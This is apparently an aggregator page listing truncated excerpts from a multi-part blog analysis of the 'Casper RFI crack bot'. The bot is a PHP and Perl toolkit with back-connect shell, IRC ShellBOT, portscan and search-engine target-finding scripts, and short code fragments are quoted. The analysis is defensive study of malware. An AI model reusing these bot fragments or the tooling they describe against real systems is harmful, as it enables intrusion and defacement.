Casper RFI crack bot – Part 7
At first I was thinking that these might be encrypted, but that did not turn out to be the case. The first one we found was back_connect_pl....
View ArticleCasper RFI crack bot – Part 8
We have one more to decode, $shell_data $shell_data = "$visitcount = $HTTP_COOKIE_VARS["visits"]; if( $visitcount == "") { $visitcount = 0; $visitor = $_SERVER["REMOTE_ADDR"]; $web =...
View ArticleCasper RFI crack bot – Part 9
So it looks like sh.txt is all about shell access, wow what a surprise! The next item is def.txt, there is not a whole lot in there beside the defacement message, so we are going to move on. The next...
View ArticleCasper RFI crack bot – Part 10
The next on the list is $filebotphp = "bot.txt"; This looks pretty specific to the irc bot, but there is something encoded again just like in the other scripts. $dc_source =...
View ArticleClik here to view.
Casper RFI crack bot – Part 11
Ok we have a couple more to go through. Next is; $filebotperl = "iso.txt"; I love comments, at least we don’t have to guess what this is for. #!/usr/bin/perl # # ShellBOT by: devil__ # Greetz: Puna,...
View ArticleCasper RFI crack bot – Part 12
So what is going on next, my $line_temp; while( 1 ) { while (!(keys(%irc_servers))) { conectar("$nick", "$servidor", "$porta"); } delete($irc_servers{''}) if (defined($irc_servers{''}));...
View ArticleClik here to view.
Casper RFI crack bot – Part 13
There is a few more things that are worth looking at. if ($funcarg =~ /^portscan (.*)/) { my $hostip="$1"; my...
View ArticleCasper RFI crack bot – Part 14
One more script listed at the top of the main one. $filebotscan = "scan.txt"; It’s full of all sorts of stuff nothing really caught my attention until I reached this. ##[ GOOGLE ]## sub se_google { my...
View ArticleCasper RFI crack bot – Part 15
What this appears to be looking for is more machines to exploit, big surprise! I followed it back for a bit and this is what I ended up with. sub se_yahoo { my ($chan,$key,$nf) = @_; sub s_engine { my...
View ArticleCasper RFI crack bot – Part 16 – Last Part
So looking over all of the scripts what do we have? What is in use here is a collection of scripts by varying authors from multiple nationalities in different languages. This in a best case scenario...
View Article